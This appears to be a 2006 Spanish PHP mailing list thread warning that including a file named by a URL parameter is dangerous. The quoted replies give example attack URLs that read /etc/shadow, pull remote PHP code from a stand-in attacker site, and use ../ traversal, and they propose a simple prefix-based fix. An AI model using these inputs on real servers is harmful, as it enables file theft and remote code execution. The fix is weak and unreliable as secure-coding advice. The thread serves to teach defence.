Grácias a todos, estoy tomando nota de todo y en cuanto termine con otro
trabajo en el que estoy liada, me pongo a tratar de sacarle el entrecijo a
vuestras aportaciones y, si lo consigo :-),  a ponerlas en práctica.

Núria




2006/10/17, Pablo Viojo <[EMAIL PROTECTED]>:
>
> Si, es cierto, lo importante era la idea nada más.
>
> Saludos, Pablo
>
> On 10/17/06, carlos campderrós <[EMAIL PROTECTED]>
> wrote:
> >
> > CUIDADÍN!!! imaginate esta dirección:
> > http://tu-servidor.com/index.php?url=/etc/shadow o
> >
> >
> http://tu-servidor.com/index.php?url=http://sitio-de-script-kiddies.com/exploit.php
> > .
> >
> > En el primer caso un atacante malicioso podría acceder a cualquier
> > archivo del servidor (bueno, puntualizando, a cualquier archivo al que
> > el usuario con el que el servidor web se ejecuta tenga acceso) y en el
> > segundo, pueden ejecutar el código php que quieran en tu servidor (por
> > ejemplo, descargar algun programa en /tmp y ejecutarlo (con los mismos
> > permisos que se ejecuta el servidor web)).
> >
> > soluciones:
> >   para ambos casos: include("pag_".$_GET['url'].".php");
> >   (algo como include("./".$_GET['url']); no funcionaria para el
> > segundo caso:
> > http://tu-servidor.com/index.php?url=../../../../../../../../etc/shadow
> > )
> >
> >   sólo para el segundo caso (aunque siempre aconsejable): desactivar
> > fopen_wrappers (o algo así) en php.ini (y reiniciar el servidor web).
> >
>
_______________________________________________
Lista de distribución Ovillo
Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org
Puedes modificar tus datos o desuscribirte en la siguiente dirección: 
http://lists.ovillo.org/mailman/listinfo/ovillo

Responder a